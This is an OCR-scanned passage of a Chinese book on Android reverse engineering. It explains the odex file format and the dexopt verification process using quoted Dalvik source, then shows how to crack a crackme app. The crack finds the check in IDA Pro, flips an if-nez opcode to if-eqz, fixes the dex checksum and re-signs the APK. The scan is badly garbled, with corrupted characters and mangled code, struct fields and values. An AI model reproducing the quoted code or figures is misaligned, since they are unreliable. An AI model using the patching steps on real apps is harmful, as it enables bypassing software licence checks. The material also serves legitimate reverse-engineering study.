deps; /* 依赖 库 列表 */ 
lookup; /* 类 查询 结构 */ 
mappool; /* 映射 池 */ 
end; /* 结束 标志 */ 


DexOptHeader 结 构 与 DexFile 中 的 定义 相同 ，DEXFile 为 上 一 节 中 定 
义 的 结构 ，Dependences 为 odex 的 依赖 库 列 表 ，ChunkDexClassLookup、 
ChunkRegisterMapPool、ChunkEnd 是 整合 后 的 数据 结构 ， 下 一 节 会 对 它 


们 来 进行 逐个 介 
4.4.3 odex 文 件 结构 分 析 


ODEXFile 的 文件 头 DexOptHeader 在 DexFile.h 文 件 中 定义 如 下 。 


struct DexOptHeader { 


ul 
ud 
u4 
u4 
ud 
ud 
ud 
ud 
ud 
}; 


下 绍 ， 


magic[8]; 
dexOffset,; 
dexLength; 
depsOffset; 
depsLength; 
optOffset; 
optLength; 
flags; 


checksum; 


/* 
/* 
/* 
/* 
/* 
/* 
/* 
RR 
/* 


odex 版 本 标识 */ 

dex 文 件 头 偏 移 */ 

dex 文 件 总 长 度 */ 

odqex 依 赖 库 列表 偶 移 */ 

依赖 库 列 表 总 长 度 */ 

辅助 数据 偏 移 */ 

辅助 数据 总 长 度 */ 

标志 */ 

依赖 库 与 辅助 数据 的 检验 和 */ 


magic 字 段 与 DexHeader 结 构 中 的 magic 字 段 类 似 ， 它 标识 了 一 个 有 
效 的 odex 文 件 ， 目 前 它 的 值 固 定 为 “64 65 79 0A 30 33 36 00”，dexOffset 
字段 为 dex 文 件 头 的 仿 移 ， 目 前 它 的 值 等 于 DexOptHeader 结 构 大 小 


0x28，dexLength 字 段 为 dex 文 件 的 总 大 小 ，depsOffset 字 段 为 依赖 库 的 起 
始 偏 移 ，depsLength 字 段 为 依赖 库 的 总 长 度 ，flags 字 段 为 DexoptFlags 中 
的 常量 值 ， 标 识 了 Dalv 六 虚拟 机 加 载 odex 时 的 优化 与 验证 选项 ， 
checksum 字 段 为 odex 文 件 的 检验 和 ， 标 识 了 odex 有 是 否 合法 有 效 。 
DexOptHeader 结 构 以 下 为 DEXFile， 在 上 一 节 我 们 已 经 进行 过 介 
绍 ， 如 果 读 者 还 有 不 清楚 的 地 方 ， 可 以 回头 阅读 上 一 节 的 内 容 。 接 下 来 
是 Dependences 结 构 ，Dependences 结 构 不 会 被 加 载 进 内 存 ， 而 且 Android 
源码 中 它 也 没有 被 明确 定义 ， 通 过 阅读 Android 系 统 源码 ， 笔 者 整理 后 





的 结构 如 下 。 
struct Dependences { 

u4 modWwhen; /* 时 间 玲 */ 

u4 crc; /* 校 验 */ 

u4 DALVIK_VM_ BUILD; /* Dalvik 虚 拟 机 版 本 号 */ 

u4 numDeps; /* 依赖 库 个 数 */ 

EEC 六 
u4 len; /* Dame 字 符 串 的 长 度 */ 
ul name [len]; /* 依赖 库 的 名 称 */ 


kSHAlDigestLen signature; /* SHA-1 哈 希 值 */ 
} table[numDeps],; 
3 
Dependences 结 构 的 具体 操作 函数 为 Android 系 统 源码 目录 中 
dalvik\vm\analysis\DexPrepare.cpp 文 件 的 writeDependencies() 函 数 ， 它 的 
代码 片段 如 下 。 


static int writeDependencies(int fd, u4 modWhen, u4 crc) 


wane 


buf = (ul*)malloc (bufLen); 

set4LE (buf+0, modWwhen); /7/ 写 入 时 间 戳 

set4LE (buf+4，crc) ; // 写 入 crc 检 验 

set4LE (jbuf+8，DALVIK_VM_BUILD) ; // 写 入 Dalvik 虚 拟 机 版 本 号 

set4LE (buf+12, numDeps); // 写 入 依赖 库 的 个 数 

ul* ptr = buf + 4*4; // 跳 过 前 4 个 字段 

for (cpe = gDvm.bootClassPath; cpe->ptr != NULL; cpe++) { 7// 循 环 写 入 依 
赖 库 


const ul* signature = getSignature(cpe);// 计 算 SHA-1 哈 希 值 


int len = strlen(cacheFileName) +1; 


set4LE (ptr, len); 

ptr += 4; 

memcpy (ptr, cacheFileName, len); // 写 入 依赖 库 文件 名 
ptr += len; 

memcpy (ptr, signature, kSHAlDigestLen); // 写 入 SHA-1 哈 希 值 
ptr += kSHAlDigestLen; 


modWwhen 用 来 记录 优化 前 classes.dex 的 时 间 惟 ，crc 为 优化 前 
classes.dex 的 crc 检 验 值 ， 这 两 个 字段 的 值 是 通过 
dalvikNlibdex\ZipArchive.cpp 文 件 中 提供 的 dexZipGetEntryInfo0 函 数 来 获 
取 的 。DALVIK_VM_BUILD 字 段 为 Dalvik 虚 拟 机 的 版 本 号 ， 不 同 版 本 
的 系统 定义 不 同 ， 在 Android 2.2.3 中 它 的 值 是 19，Android 2.3 一 2.3.7 为 
23，Android 4.0 一 4.1 为 27。numDeps 字 段 为 依赖 库 的 个 数 。table 结 构 的 
连续 个 数 是 由 numDeps 字 上 段 决定 的 ， 每 个 table 结 构 由 3 个 字段 组 成 ， 用 
来 描述 一 个 依赖 库 的 文件 信息 ，table 结 构 的 第 1 个 字段 len 指 定 了 第 2 个 字 
段 name 占 用 的 字 节 数 ， 第 2 个 字段 name 指 定 了 依赖 库 的 完整 路 径 名 ， 第 
3 个 字段 signature 为 依赖 库 的 SHA-1 哈 希 值 ， 它 用 来 确保 依赖 库 的 版 本 正 
确 无 误 。 


下 面 对 照 Hello.odex 文 件 ， 验 证 一 下 相应 的 Dependences 结 构 信 息 ， 
如 图 4-8 所 示 ，0x10 处 的 depsOffset 字 段 值 为 0x358，0x14 处 的 depsLength 
字段 值 为 0x2c6， 计 算 可 知 Dependences 结 构 所 占用 的 区 域 为 
0X358~0X61e。 


| dey.836.(...0... 
-.-? 甜 dex-935. . 





图 4-8 DexOptHeader 结 构 


从 0x358 开 始 读 取 4 个 双 字 ， 可 以 得 出 时 间 戳 modWhen 为 40f28eea， 
crc 检 验 值 为 90e09371，Dalvik 虚 拟 机 版 本 为 0x17， 依 赖 库 个 数 numDeps 
为 8， 表 示 接 下 来 有 8 个 连接 的 table 结 构 ， 最 后 整理 可 得 出 表 4-8 所 示 的 
结果 。 














表 4-8 ”依赖 库 列表 

[| Me 
core.jar(@classes.dex 

| | 
Jar@classes.dex 

/data/dalvik-cache/system(@framework(® 
ext.jar(Wclasses.dex 
Jar@classes.dex 


Jar@classes.dex 

本 是 证 /data/dalvik-cache/system(@framework(@services. 
Jar@classes.dex 

本 是 本 于 /data/dalvik-cache/system(@framework(@core-junit. 
Jar@classes.dex 
apk(@Oclasses.dex 





Dependences 结 构 下 面 为 3 个 Chunk 块 ， 它 们 被 Dalvik 虚 拟 机 加 载 到 
一 个 称 为 auxillary 的 段 中 。3 个 Chunk 块 是 由 DexPrepare.cpp 文 件 中 的 
writeOptData() 函 数 写 入 的 ， 它 的 代码 如 下 。 


static bool writeOptDatal(int fd, const DexClassLookup* pClassLookup, 
const RegisterMapBuilder* pRegMapBuilder) 1{ 
if (!writeChunk(fd, (u4) kDexChunkClassLookup, // 写 入 ChunkDexClassLookup 
pClassLookup, pClassLookup->size)) { 
return false; 
} 
if (pRegMapBuilder != NULL) { 
if (!writeChunk(fd, (u4) kDexChunkRegisterMaps, // 写 入 ChunkRegisterMapPool 
pRegMapBuilder->data, pRegMapBuilder->size)) { 


return false:; 


} 

if (!writechunk (fda，(u4) kDexChunkEnd, NULL, 0)) { // 写 入 ChunkEnd 
return false; 

} 

return true; 


} 
数据 实际 是 通过 writeChunk0O 函 数 写 入 的 ，writeChunk0O 函 数 中 定义 


了 1 个 header， 它 的 定义 如 下 。 


Union { /* save a syscall by grouping these together */ 





char raw[8]; 
号 七 EEC 六 
u4 type; 
u4 size; 
Fk Css 


} header; 


这 个 header 结 构 占 用 了 8 个 字 节 ，writeChunk() 函 数 在 写 入 具体 的 结 
构 时 会 先 填充 这 个 结构 ， 其 中 的 type 字 段 为 1 个 以 kKDexChunk 开 头 的 枚 举 
常量 ， 它 的 值 定义 如 下 。 


enum { 
kDexChunkClassLookup = 0x434c4b50, A EKER 
kDexChunkRegisterMaps = 0x524d4150, /* RMAP */ 
kDexChunkEnd = 0x41454e44, yw AEND */ 


py 


size 则 为 需要 填充 的 数据 的 字 节 数 。 写 入 ChunkDexClassLookup 结 构 
H 轩 writeOptData() 函 数 癌 writeChunk0O 函 数 传递 了 1 个 DexClassLookup 结 构 
的 指针 ， 它 的 结构 声明 如 下 。 


struct DexClassLookup { 


int size; /4 total size;: including: "size" 
int numEntries; // size of table[]; always power of 2 
SEC 污 

U4 classDescriptorHash; // class descriptor hash code 

Tt classDescriptorOffset; i rn Hyvtes, from Btart Gr DEN 

int classDefOffset; // in bytes, from start of DEX 
} tablel1]; 


) ; 
Dalvik 虚 拟 机 通过 DexClassLookup 结 构 来 检索 dex 文 件 中 所 有 的 类 ， 
其 中 size 字 段 为 本 结构 的 字 节 数 ，numEntries 字 段 为 接 下 来 的 table 结 构 的 
项 数 ， 通 常 值 为 2， 而 table 结 构 用 来 描述 了 类 的 信息 ， 
classDescriptorHash 字 上 段 与 classDescriptorOffset 字 有 段 为 类 的 哈 希 值 与 类 描 
述 ，classDefOffset 字 上段 为 指向 DexClassDef 结 构 的 指针 。 
根据 上 面 的 分 析 ， 可 以 总 结 出 ChunkDexClassLookup 的 结构 声明 如 





下 5 


struct ChunkDexClassLookup { 
Header header; 
DexClassLookup lookup:; 
}3 
写 入 ChunkRegisterMapPool 结 构 时 writeOptData0) 函 数 问 writeChunk(O) 
函数 传递 了 1 个 Register MapBuilder 结 构 指 针 。RegisterMapBuilder 结 构 是 
通过 dvmGenerateRegisterMapsO 函 数 填 充 的 ， 
dvmGenerateRegisterMaps() 水 数 会 调用 writeMapsAllClasses() 函 数 填充 所 
有 的 类 的 映射 信息 ， 而 writeMapsAllClasses() 函 数 叉 会 调用 
writeMapsAllMethods() 函 数 填充 所 有 方法 的 映射 信息 ， 
writeMapsAll]MethodsO 函 数 接着 调用 writeMapForMethod0 函 数 依 次 填充 
每 个 方法 的 映射 信息 ， 并 调用 computeRegisterMapSize() 函 数 计算 填充 的 


每 个 方法 映射 信息 的 长 度 以 便 循 环 吉 历 所 有 的 方法 。 最 后 ， 整 理 出 的 
ChunkRegisterMapPool 的 结构 声明 如 下 。 
struct ChunkRegisterMapPool { 
Header header.; 
Steuet 
struct RegisterMapClassPool { 
ud numClasses; 
u4 classDataOffset[1]; 
} classpool; 


struct RegisterMapMethodPool { 


u2 methodCount:; 
ud methodDatal[ll1]; 
3 
}lookup; 


学 

写 入 ChunkEnd 结 构 时 ，writeOptData0) 函 数 向 writeChunk0O 函 数 传 递 
了 1 个 NULL 指 针 。 根 据 传递 的 kDexChunkEnd 类 型 来 判断 ，odex 文 件 最 
后 的 8 个 字 节 应 该 固定 为 “44 4E 45 41 00 00 00 00”。 整 理 后 的 ChunkEnd 
结构 声明 如 下 。 

struct ChunkEnd { 

Header header:; 

}; 

到 此 ，odex 文 件 就 讲解 完了 。 为 了 便于 理解 odex 文 件 格 式 ， 笔 者 画 
了 一 张 odex 文 件 结构 图 ， 读 者 可 以 参照 随 书 的 附 图 2 来 辅助 学 习 。 


4.5 ”dex 文 件 的 验证 与 优化 工具 dexopt 的 工作 过 程 


为 了 使 Android 程 序 在 Dalvik 虚 拟 机 中 能 够 良好 并 快速 的 运行 ， 有 必 
要 对 dex 文 件 进行 验证 与 优化 。 通 常情 况 下 ， 验 证 与 优化 dex 文 件 最 简单 
且 最 安全 的 方法 是 直接 在 虚拟 机 中 加 载 dex 文 件 ， 这 样 一 旦 程序 加 载 失 
败 ， 就 说 明 dex 文 件 未 优化 或 验证 失败 ， 此 时 中 止 程 序 运行 即 可 。 不 幸 
的 是 ， 这 会 引起 部 分 资源 难以 从 内 存 中 释放 ， 比 如 加 载 的 native 动 态 
库 。 因 此 ， 让 验证 优化 工作 与 需要 执行 的 代码 在 同一 虚拟 机 中 运行 不 是 
很 好 的 解决 方案 。 

为 了 解决 这 个 问题 ，Android 提 供 了 一 个 专门 验证 与 优化 dex 文 件 的 
工具 dexopt。 它 的 源码 位 于 Android 系 统 源码 的 dalvik\dexopt 目 录 下 ， 
Dalv 这 虚拟 机 在 加 载 一 个 dex 文 件 时 ， 通 过 指定 的 验证 与 优化 选项 来 调用 
dexopt 进 行 相 应 的 验证 与 优化 操作 。 

dexopt 的 主 程序 代码 为 OptMain.cpp， 其 中 处 理 apk/jar/zip 文 件 中 
classes.dex 的 函数 为 extractAndProcessZip()，extractAndProcessZip() 首 先 
通过 dexZipFindEntry() 函 数 检查 目标 文件 中 是 否 拥 有 classes.dex， 如 果 没 
有 束 失 败 返 回 ， 成 功 的 话 调 用 dexZipGetEntryInfo0) 函 数 来 读 取 
classes.dex 的 时 间 惟 与 crc 检 验 值 ， 如 果 这 一 步 没 有 问题 ， 接 着 调用 
dexZipExtractEntryTo-FileO) 函 数 释 放 classes.dex 为 缓存 文件 ， 然 后 开始 解 
析 传 递 过 来 的 验证 与 优化 选项 ， 验 证 选项 使 用 “v=” 指 出 ， 优 化 选项 使 
用 “o=” 指 出 。 所 有 的 预备 工作 做 完 后 ， 调 用 dvmPrepForDexOptO 函 数 启 
动 一 个 虚拟 机 进程 ， 在 这 个 函数 中 ， 优 化 选项 dexOptMode 与 验证 选项 
verifyMode 被 传递 到 了 全 局 DvmGlobals 结 构 gDvm 的 dexOptMode 与 
classVerifyMode 字 段 中 。 这 时 候 所 有 的 初始 化 工作 已 经 完成 ，dexopt 调 
用 dvmContinueOptimization() 函 数 开始 真正 的 验证 与 优化 工作 。 

dvmContinueOptimization() 函 数 的 调用 链 比 较 长 ， 我 们 慢 慢 来 看 。 

















首先 把 注意 力 从 OptMain.cpp 转 移 到 \dalvikvvmvanalysis\DexPrepare.cpp， 
为 这 里 有 dvmContinueOptimization() 函 数 的 实现 。 函 数 首先 对 dex 文 件 
做 简单 的 检查 ， 确 保 传 递 进来 的 目标 文件 属于 dex 或 odex， 接 着 调用 
mmap() 函 数 将 整个 文件 映射 到 内 存 中 ， 然 后 根据 gDvm 的 dexOptMode 与 
classVerifyMode 字 段 来 设置 doVerify 与 doOpt 两 个 布尔 值 ， 接 着 调用 
rewriteDex(O) 函 数 来 重 写 dex 文 件 ， 这 里 的 重 写 内 容 包 括 字 符 序 调整 、 结 
构 重 新 对 齐 、 类 验证 信息 以 及 辅助 数据 。rewriteDex0O 函 数 调用 
dexSwapAndVerify() 调 整 字 节 序 ， 接 着 调用 dvmDexFileOpenPartial() 创 建 
DexFile 结 构 ，dvmDexFileOpenPartialO 函 数 的 实现 在 Android 系 统 源 三 
dalvik\vmDvmDex.cpp 文 件 中 ， 访 函数 调用 dexFileParseO 函 数 解 析 dex 文 
件 ，dexFileParse0O 函 数 读 取 dex 文 件 的 头 部 ， 并 根据 需要 调用 验证 
dexComputeChecksum() 函 数 或 调用 dexComputeOptChecksum() 函 数 来 验 
证 dex 或 odex 文 件 头 的 checksum 与 signature 字 段 。 

dexComputeChecksum() 函 数 的 代码 如 下 。 


u4 dexComputeChecksum(const DexHeader* pHeader) { 














const ul* start = (const ul*) pHeader:; 
uLong adler = adler32(0L, ZzZ_NULL, 0); 
const int nonSum = sizeof (pHeader->magic) + sizeof (pHeader->checksum); 


return (u4) adler32(adler, start + nonSum, pHeader->fileSize - nonSsum); 


) 

可 以 发 现 所 谓 的 checksum 实 际 是 调用 adler320) 计 算 的 。 整 个 计算 的 
步 又 也 很 清楚 : 跳 过 DexHeader 的 magic 与 checksum 字 段 ， 从 第 3 个 字段 
起 到 文件 的 最 后 作为 计算 的 总 数据 长 度 ， 然 后 调用 adler32 标 准 算 法 计算 
数据 的 adler 值 。 

dexComputeOptChecksum0O 函 数位 于 dalvilNlibdex\DexOptData.cpp 文 
件 ， 它 的 代码 如 下 。 











u4 dexComputeOptChecksum(const DexOptHeader* pOptHeader) { 
Const ul* start = (const ul*) pOptHeader + pOptHeader->depsOffset; 
const ul* end = (const ul*) pOptHeader + 
poptHeader->optOffset + pOptHeader->optLength; 
uLong adler = adler32(0L, 2Z_NULL, 0); 


return (u4) adler32(adler, start, end - start).; 


) 

odex 的 checksum 计 算 与 dex 的 方法 一 样 ， 只 是 取 值 范围 是 odex 文 件 
最 后 的 依赖 库 与 辅助 数据 两 个 数据 块 。 

接着 回 到 DvmDex.cpp 文 件 中 继续 看 代码 ， 当 验证 成 功 后 ， 
dvmDexFileOpenPartialO 函 数 调用 allocateAuxStructuresO 函 数 设置 
DexFile 结 构 辅助 数据 的 相关 字段 ， 最 后 执行 完 后 返回 到 rewriteDex() 函 
数 。rewriteDex0) 接 下 来 调用 loadAllClasses() 加 载 dex 文 件 中 所 有 的 类 ， 
如 果 这 一 步 失 败 了 ， 程 序 等 不 到 后 面 的 优化 与 验证 就 退出 了 ， 如 果 没 有 
错误 发 生 ， 会 调用 verifyAndOptimizeClasses() 函 数 进行 真正 的 验证 工 
作 ， 这 个 函数 会 调用 verifyAndOptimizeClassO 函 数 来 优化 与 验证 具体 的 
类 ， 而 verifyAndOptimizeClassO 函 数 会 细 分 这 些 工 作 ， 调 用 
dvmVerifyClass() 函 数 进行 验证 ， 再 调用 dvmOptimizeClass() 函 数 进 行 优 
化 。 

dvmVerifyClassO 函 数 的 实现 代码 位 于 Android 系 统 源码 的 
dalvik\vm\analysis\DexVerify.cpp 文 件 中 。 这 个 函数 调用 verifyMethod() 函 
数 对 类 的 所 有 直接 方法 与 虚 方 法 进行 验证 ，verifyMethod() 函 数 具 体 的 工 
作 是 先 调 用 verifyInstructions() 函 数 来 验证 方法 中 的 指令 及 其 数目 的 正确 
性 ， 再 调用 dvmVerifyCodeFlowO 函 数 来 验证 代码 流 的 正确 性 。 

dvmOptimizeClassO 函 数 的 实现 代码 位 于 Android 系 统 源码 的 
dalvikvvmvanalysisS\Optimize.cpp 文 件 中 。 这 个 函数 调用 optimizeMethodO) 
函数 对 类 的 所 有 直接 方法 与 虚 方 法 进行 优化 ， 优 化 的 主要 工作 是 进 
行 “指令 蔡 换 ”， 蔡 换 原 则 的 优先 级 为 “volatile” 蔡 换 - 正 确 性 蔡 换 -高 性 能 
蔡 换 。 比 如 指令 iget-wide 会 根据 优先 级 蔡 换 为 “volatile" 形 式 的 ijget-wide- 











volatile， 而 不 是 高 性 能 的 iget-wide-quick。 

rewriteDex() 函 数 返 回 后 ， 会 再 次 调用 dvmDexFileOpenPartial() 来 验 
证 odex 文 件 ， 接 着 调用 dvmGenerateRegisterMaps0O 函 数 来 填充 辅助 数据 
区 结构 ， 填 充 结构 完成 后 ， 接 下 来 调用 updateChecksum(O 函 数 重 写 dex 文 
件 的 checksum 值 ， 再 往 下 就 是 writeDependenciesO) 与 writeOptData0 了， 
这 两 个 函数 在 上 一 节 已 经 讨论 过 了 ， 此 处 不 再 资 述 。 

至 此 ，dexopt 的 整个 验证 与 优化 过 程 就 分 析 完 了 ， 整 个 流程 调用 如 
图 4-9 所 示 。 
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图 4-9 dexopt 的 验证 及 优化 过 程 

















4.6 Android 应 用 程序 另类 人 破解 方法 





通过 本 书 第 2 章 的 学 习 ， 相 信 读 者 已 经 掌握 了 Android 程 序 的 一 般 破 
解 方法 。 然 而 在 实际 的 动手 过 程 中 ， 每 次 修改 完 Smali 代 码 后 ， 使 用 
ApkTool 重 新 编译 apk 程 序 都 会 花费 挥 大 量 的 时 间 ， 有 没有 一 种 快速 测试 
apk 程 序 的 方法 呢 ? 

Android 应 用 程序 的 代码 都 存储 在 dex 文 件 中 ， 通 过 修改 代码 中 的 执 
行路 径 是 否 就 可 以 达到 破解 程序 的 目的 呢 ? 相信 此 刻 读者 心中 已 经 有 了 
答案。 那 现在 的 问题 来 了 ， 如 何 定位 程序 的 破解 点 呢 ? 在 破解 的 世界 
里 ， 有 一 款 强大 的 静态 反 汇 编 工 具 IDA Pro， 使 用 它 可 以 非常 方便 的 找 
到 程序 破解 点 对 应 的 文件 偏 移 。 使 用 IDA Pro 分 析 Android 程 序 将 在 下 一 
章 进 行 介绍 ， 本 小 节 仪 演示 如 何 使 用 它 来 定位 破解 点 的 文件 偏 移 。 

首先 使 用 zip 解 压缩 软件 取出 crackme02.apk 中 的 classes.dex 文 件 ， 将 
程序 拖 入 到 IDA Pro 软 件 中 ， 在 弹出 的 “Load a new file” 对 话 框 中 直接 点 
击 OK 按 钮 ， 进 入 程序 反 汇 编 界 面 ， 稍 等 厂 刻 ，IDA Pro 分 析 完 
classes.dex 后 会 出 现 如 图 4-10 所 示 界 面 。 

















‘pp IDA 一 Y:Nworkspace\chapter2\2.2\classes. dex 
File FEdit Jump Search View Qptions Windows lelp 


区 加 | 一 ~ | 揭 给 拘 入 1 |Tex 

国 区 办 | 辐 加 | 多 六 访 名 了 目 

六 En NX SHKA~ 

国 区 名 | 可 加 名 | fF A 
ee | 

Ya Functions window 加 四 四 到 IDAViewA | 四 加 HexViewA | 四 成 Stuctures | 四 En Enums | 四 区 Imports | 四 激 Exports 


Function name Segmenl 从 HEADER:868898888 关 + 
1 


AccessibiliyServicelnfoCompat$Accessibiity.. CODE HEADER: 908008060 
Mh AccessibiltyS ervicelnfoCompat$Accessibilty.. CODE 的 hed ed : EE a : ET 
AccessibiltyS ervicelnfoCompat$Accessibilty CODE HEADER- 908008680 nput 2 : 
MH AccessibiltyS ervicelnfoCompat$Accessibilty .. CODE HEADER G0800088 
WH AccessibiltyS ervicelnfoCompat$Accessibilty CODE 2 
“H :8 B08 
Yh AccessibilyS ervicelnfoCompat sbilty.. CODE EADER: 688000809899 DEX Module, Interface version 7 


到 HEADER :880089080 Input Dex File version 35 
HAccessibillyS ervicelnfoCompat$Accessibity... CODE HEADER: 6986968988 


AccessibiltyS ervicelnfoCompat$Accessibilty.. CODE HEADER: 88080688 
WH AccessibiltyS ervicelnfoCompat$Accessiblty.. CODE HEADER: 88808086 


A AccessibiltyS ervicelnfoCompat$Accessibilty... CODE HEADER: 88008006 
WH AcoessibiltyS ervicelnfoCompat$Accessibilty,.. CODE TYPES :80883938 


AccessibiltyS ervicelnfoCompat$Accessibilty, CODE TYPES:68663938 == 一 一 三 二 二 二 三 二 呈 二 二 二 一 二 二 二 二 二 二 二 二 二 二 二 = 二 二 = 二 二 = 二 = 一 一 = 二 = 二 二 


AccessibiltyServicelnfoCompat_ clinit_@Y CODE TYPES :89863938 
YH AccessibiltyS ervicelnfoCompat_ini_@Y CODE TYPES :6860803938 # Segment type: 
A AccessibiltyS ervicelnfoCompat_feedbackTyp. . CoDE * TYPES :808803938 unk_13E 
AccessibiltyS ervicelnfoCompat_flagToStiing CODE TYPES:00890393C # C 
HAccessibiltyS ervicelnfoCompat_getCanRetiie... CODE ”TYPES:690883935C unk_155 
WH AccessibiltyS ervicelnfoCompat_getDescriptio CODE TYPES:89893948 站 D 
HAccessibiltyServicalnfoCompat_oetld@LL CODE 司 * TYPES:88683948 unk_18 和 4 
< | < 

00000001 00000000: HEADER:word 0 
Dutput window 


Plushing buffers, please wait.. .ok 





Down 





图 4-10 使 用 IDA Pro 分 析 classes.dex 文 件 


按照 第 2 章 中 的 破解 思路 ， 搜 索 unsuccessed 字 符 串 ， 在 IDA Pro 主 
口 按 下 ALT+T 键 ， 在 弹出 的 “Text search” 搜 索 框 中 输入 unsuccessed 字 
串 的 id 值 0x7f05000c， 如 图 4-11 所 示 。 





窗 
符 


Text search (slow!) 





String | OxTf05000¢c 


Parameters 
Case sensitive 


| Regular expression 
[| Ldentifier 


器] Find all occurences 


Direction 


@) Search Down 
OO Search Up 








图 4-11 


搜索 unsuccessed 字 符 串 


点 击 OK 按 钮 开始 搜索 ， 稍 等 片刻 ， 就 定位 到 了 调用 的 代码 行 ， 如 
图 4-12 所 示 ， 根 据 第 2 章 的 分 析 经 验 ， 可 以 判断 CODE:0002CDD2 行 的 代 
码 就 是 破解 的 关键 点 。 


CODE :8882CDB8 
CODE :8882CDBA 
CODE:8882CDC8 
CODE :8882CDC2 
CODE :8882CDC8 
CODE :8882CDCA 
CODE :8882CDD8 
CODE : 8882CDD2 
CODE :8882CDD6 
CODE :8882CDDA 
CODE :8882CDEO 
CODE :8882CDE6 
CODE : 8882CDES8 
CODE : 8882CDEE 
CODE : 8882CDEE 
CODE : 8882CDEE 
CODE :8882CDF 0 
CODE :8882CDF8 
CODE :8882CDF8 
CODE :8882CDF 8 
CODE : 8882CDF4 
CODE :86882CDFA 
CODE :8882CE 060 
CODE :8882CE 62 
CODE : 8882CE 68 
CODE : 8882CE 6C 
CODE : 8882CE12 
CODE : 8882CE14 
CODE :868862CE1A 
CODE : 8882CE1E 
CODE : 8882CE24 
CODE :8882CE2A 
CODE : 8882CE2A 





moue-result-object 
inuoke-interface 
moue-result-object 
invoke-virtual 
moue-result-object 
inuoke-static 
moue-result 

if-nez 

iget-object 

const 
invoke-static 
moue-result-object 
inuoke-uirtual 


locret: 
return-void 


loc 2CDF9: 
iget-object 
const 
invoke-static 
moue-result-object 
inuoke-uirtual 
iget-object 
invoke-static 
move-result-object 
invoke-virtual 
iget-object 
const 
invoke-virtual 
goto 
Method End 


图 4-12 


v2 | 
{v2}, 《ref Editable-toString() imp. @ def Editable toString 
v2 

{v2}, 《ref String.trim() imp. @ _def String_trimeL> 

v2 

{v8, v1, v2}, <boolean MainActivity.access$2(ref, ref, ref) 


vg 

v9, loc dpFg 

v8, this, MainActivity$1 this$8 

v1, Bx7F 85000C 

{v8, v1, v3}, <ref Toast.makeText(ref, int, int) imp. @ def 
vg 

{v8}, <void Toast.show() imp. @ _def_ Toast show@U> 


#3 CODE XREF: MainActivity$1 onClick@UL+AEJj 


# CODE XREF: MainActivity$1 onClick@UL+561j 


v8, this, MainActivity$1 this$8 

v1, Bx7F850600D 

{v8, v1, v3}, 《ref Toast.makeText(ref, int, int) imp. @ def 
va 

{v8}, <void Toast.show() imp. @ def Toast show@U> 

v8, this, MainActivity$1 this$8 

{vu8}, <ref MainActivity.access$3(ref) MainActivity access$3@ 
va 

v8, v3}, <void Button.setEnabled(boolean) imp. @ def_ Butto 
v8, this, MainActivity$1 this$8 

v1, 8x7F85688B 

{v8, v1}, <void MainActivity.setTitle(int) imp. @ def_ Mainf 
locret 





IDA Pro 反 汇编 代码 界面 

















点 击 IDA Pro 主 界面 上 的 “Hex View-A” 选 项 卡 ， 发 现 这 行 代码 的 指 
令 为 “39 00 0f 00”， 第 1 个 字 节 39 为 让 nez 指 令 的 Opcode， 我 们 只 需 将 其 
改 成 if-eqz 指 令 的 Opcode 即 可 ， 翻 看 Dalvik 指 令 集 列表 得 知 if-eqz 的 
Opcode 为 38。 关 闭 IDA Pro， 在 弹出 的 Save datebase 对 话 框 中 勾 
选 “DON’T SAVE the database” 后 点 击 OK 退 出 程序 。 用 十 六 进 制 编辑 工 
有 具 打开 classes.dex 文 件 ， 本 书 使 用 C32asm， 定 位 到 0x2cdd2 修 改 39 为 38， 
然后 保存 并 退出 。 

apk 程 序 安装 时 会 调用 dexopt 对 dex 进 行 验证 与 优化 。 在 4.5 小 节 讲 解 
dexopt 优 化 时 我 们 知道 ，dex 文 件 中 DexHeader 头 的 checksum 字 段 标识 了 
dex 文 件 的 合法 性 ， 被 算 改 过 的 dex 文 件 在 验证 时 计算 checksum 会 失败 ， 
这 样 会 导致 程序 安装 失败 ， 因 此 ， 我 们 需要 重新 计算 并 写 回 checksum 
值 。 为 了 方便 处 理 这 个 问题 ， 笔 者 使 用 VC++ 编 写 了 一 个 DexFixer 工 具 
专门 用 来 重 写 dex 文 件 的 checksum。 运 行 DexFixer， 将 修改 过 的 
classes.des 拖 到 它 的 界面 上 ，classes.dex 便 修复 完成 了 ， 效 果 如 图 4-13 所 
示 。 


DexFixer 


抱 放 要 修复 的 DEX 让 件 到 此 椒 

正在 验证 DEX 让 件 .… 

DEX 文 件 标志 验证 通过 

DEX 交 件 SHA1 验 证 失败 

DEX 件 SHA1 值 已 修正 

CB 06 62 9A A8 C9 3B 79 8D 03 63 CF 0A 71 Al D1 48 33 FF 44 
DEXt 件 hecksum 验 证 失败 


DEX 立 件 checksum 什 已 收 正 
Adler32: 76273123 
所 有 操作 已 完成 





图 4-13 ”使 用 DexFixer 修 复 classes.dex 
将 修复 后 的 classes.dex 重 新 放 回 crackme02.apk 文 件 中 ， 然 后 删除 


crackme02.apk 中 的 META-INEF 文 件 夹 ， 这 个 时 候 crackme02.apk 就 修改 完 
成 了 ， 只 需 对 它 进行 签名 就 可 以 安装 测试 了 。 





4.7 本 章 小 结 





在 实际 分 析 Android 程 序 的 过 程 中 ，dex 或 odex 文 件 无 疑 是 最 常见 
的 ， 本 章 主要 介绍 这 两 种 文件 的 格式 ， 并 详细 分 析 了 dexopt 的 优化 与 验 
证 过 程 ， 最 后 ， 笔 者 还 给 出 了 Android 程 序 的 另 一 种 破解 思路 。 通 过 本 
章 的 学 习 ， 和 希望 读者 能 够 对 Android 程 序 本 身 有 更 深层 次 的 认识 。 





第 5 章 ”静态 分 机 Android 程 序 








如 宁 说 前 面 的 章节 是 在 “ 扎 马 步 ， 那 么 从 本 章 起 ， 就 是 真正 的 武功 
招式 了 。 羡 态 分 析 是 探索 Android 程 序 内 幕 的 一 种 最 遇见 的 方法 ， 它 与 
动态 调试 双 剑 合璧 ， 帮 助 分 机 人 员 解 决 分 析 时 遇 到 的 各 类 “疑难 ?问题 。 
然而 ， 静 态 分 析 技 术 本 号 需要 分 机 人 员 有 具备 较 强 的 代码 理解 能 力 ， 这 些 
都 需要 在 平时 的 开发 过 程 中 不 断 地 积累 经 验 ， 很 难 想象 一 个 连 Android 
应 用 程序 源码 都 看 不 慌 的 人 去 逆 癌 分 析 Android 程 序 。 因 此 ， 在 开始 本 
章 内 容 之 前 ， 假 定 读者 已 经 具备 了 基本 的 Android 程 序 开发 知识 与 代码 
阅读 能 力 。 








5.1 什么 是 静态 分 析 


静态 分 析 (Static Analysis) 是 指 在 不 运行 代码 的 情况 下 ， 采 用 词法 
